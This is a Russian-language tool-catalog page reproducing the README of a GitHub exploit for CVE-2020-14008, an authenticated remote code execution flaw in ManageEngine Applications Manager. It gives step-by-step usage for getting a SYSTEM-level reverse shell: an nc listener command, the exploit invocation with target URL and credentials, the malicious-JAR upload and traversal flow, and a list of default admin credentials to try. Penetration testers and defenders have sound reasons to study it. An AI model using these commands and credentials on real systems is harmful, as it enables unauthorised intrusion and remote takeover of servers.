Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-14008 — CVE-2020-14008 - ManageEngine Applications Manager RCE (удалённое выполнение кода) | Kitploit
Инструменты/GitHubGitHub/0x0d3ad/cve-2020-14008
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHub0x0d3ad/cve-2020-14008

CVE-2020-14008

CVE-2020-14008 - ManageEngine Applications Manager RCE (удалённое выполнение кода)

Репозиторий
314 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-14008 - ManageEngine Applications Manager RCE

Аутентифицированное удаленное выполнение кода через произвольную загрузку файлов в Zoho ManageEngine Applications Manager (версии <= 14720).

Сводка уязвимости

ДетальЗначение
CVECVE-2020-14008
CVSS7.2 (Высокий)
ТипАутентифицированное RCE / Произвольная загрузка файлов
ПродуктZoho ManageEngine Applications Manager
Затронутые версииВерсия 14720 и ниже
ТребованиеДействительные учетные данные администратора
РезультатReverse shell уровня SYSTEM

Эксплойт использует функцию проверки учетных данных монитора Weblogic. Аутентифицированный администратор загружает вредоносный файл weblogic.jar в ожидаемый путь библиотеки Weblogic. Когда запускается проверка учетных данных, ManageEngine загружает weblogic.jndi.Environment из загруженного JAR через JarLoader.loadClass() и newInstance(), выполняя произвольный Java-код.

Требования

Система

  • Python 3.x
  • Java JDK (javac и jar в PATH)
  • nc (netcat) для приема reverse shell

Зависимости Python

root@kitploit:~
pip3 install requests urllib3 lxml

Использование

1. Запустите слушатель

root@kitploit:~
nc -lvnp 1337

2. Запустите эксплойт

root@kitploit:~
python3 cve-2020-14008.py <URL> <USERNAME> <PASSWORD> <LHOST> <LPORT>

Примеры

root@kitploit:~
# Базовый
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337

Поток эксплойта

  1. Вход - Аутентифицируйтесь с учетными данными администратора, получите cookie сессии
  2. Перебор - Получите базовый каталог установки ManageEngine
  3. Сборка JAR - Скомпилируйте вредоносный Java-класс (weblogic.jndi.Environment) с reverse shell в weblogic.jar
  4. Загрузка - Загрузите JAR в classes/weblogic/version8/ через обход каталога (запасной вариант: создайте запланированную задачу для его перемещения)
  5. Запуск - Вызовите проверку учетных данных Weblogic по адресу /testCredential.do, которая загружает и создает экземпляр вредоносного класса
  6. Shell - Reverse shell подключается обратно к слушателю

Учетные данные по умолчанию

Имя пользователяПароль
adminadmin
adminpassword
administratoradministrator
guestguest

Устранение неполадок

ОшибкаИсправление
release version 7 not supportedJava 21+ убрала цель Java 7. Скрипт использует --release 8
FileNotFoundError: weblogic.jarОшибка компиляции JAR. Убедитесь, что javac и jar находятся в PATH
No valid response from used sessionНеверные учетные данные
Actionname not foundНе удалось создать задачу, проверьте права администратора

Ссылки

  • NVD - CVE-2020-14008
  • Exploit-DB #48793
  • Рекомендации ManageEngine

Отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования на проникновение и исследований безопасности. Несанкционированное использование против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным.

Скачать инструмент